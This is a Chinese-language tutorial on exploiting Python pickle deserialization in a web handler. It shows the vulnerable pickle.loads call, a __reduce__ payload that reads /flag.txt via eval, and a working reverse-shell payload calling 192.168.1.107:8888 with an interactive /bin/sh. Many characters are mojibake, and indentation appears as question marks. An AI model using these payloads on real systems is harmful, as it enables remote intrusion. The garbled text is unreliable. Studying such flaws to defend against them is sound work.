原理
在網(wǎng)頁源碼中如果出現(xiàn)將用戶輸入數(shù)據(jù)進(jìn)行反序列化當(dāng)成參數(shù)輸出時,出現(xiàn)漏洞,可造成任
意命令執(zhí)行
例如網(wǎng)頁源碼
try:
?????? become = self.get_argument('become')
?????? p = pickle.loads(urllib.unquote(become))
?????? return self.render('form.html', res=p, member=1)
except:
??????? return self.render('form.html', res='This is Black Technology!', member=0)
過程:用戶傳入become參數(shù),服務(wù)器將become參數(shù)url解碼再反序列化并將結(jié)果給p,將p當(dāng)
作一個參數(shù)給res,并且form.html有向客戶端顯示res的部分

那么攻擊方式就是修改可控的become參數(shù),當(dāng)序列化以及反序列化的過程中中碰到一無所知的擴(kuò)展類型( python2,這里指的就是新式類)的時候，可以通過類中定義的 __reduce__ 方法來告知如何進(jìn)行序列化或者反序列化。
也就是說我們，只要在新式類中定義一個__reduce__ 方法，我們就能在序列化的使用讓這個類根據(jù)我們在 __reduce__ 中指定的方式進(jìn)行序列化。

Demo:
①首先用python得到攻擊所需的payload
class payload(object):
?? ?def __reduce__(self):
?? ??? ?return (eval,("open('/flag.txt','r').read()",))? //表示用eval的方式序列化后面內(nèi)容
a=pickle.dumps(payload())? //得到指定方法序列化后的pickle數(shù)據(jù)
print(urllib.quote(a))???? //得到url編碼后的payload

②接下來服務(wù)端收到payload后
p = pickle.loads(urllib.unquote(a)) //先url解碼再用指定方法反序列化內(nèi)容,結(jié)果執(zhí)行了代碼
return self.render('form.html', res=p, member=1)? //這時p已經(jīng)是執(zhí)行代碼后的內(nèi)容了

拓展:
既然能夠任意執(zhí)行代碼,那么就可以反彈shell,以下為payload代碼
import pickle
import urllib
import os

class exp(object):
? ?def __reduce__(self):
? ? ? ?s="""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.107",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """
? ? ? ?return os.system, (s,)? //指明用os.system方法序列化s字符串內(nèi)容
?
poc = pickle.dumps(exp()) //按照指定方式序列化字符串
print(urllib.quote(poc))

詳細(xì)的看下字符串內(nèi)容
python -c '執(zhí)行命令'
執(zhí)行命令
Import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.1.107",8888));
os.dup2(s.fileno(),0);???? //表示所有的輸入內(nèi)容都傳送給socket
os.dup2(s.fileno(),1);??? //表示所有的輸出內(nèi)容都傳送給socket
os.dup2(s.fileno(),2);?? //表示所有的錯誤輸出都傳送給socket
p=subprocess.call(["/bin/sh","-i"]);?? //使用sh -i 使shell可交互